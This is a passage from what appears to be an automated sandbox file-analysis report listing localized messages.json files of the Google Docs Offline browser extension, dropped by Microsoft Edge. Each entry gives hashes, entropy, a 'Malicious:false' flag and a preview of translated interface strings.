                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                      Encrypted:false
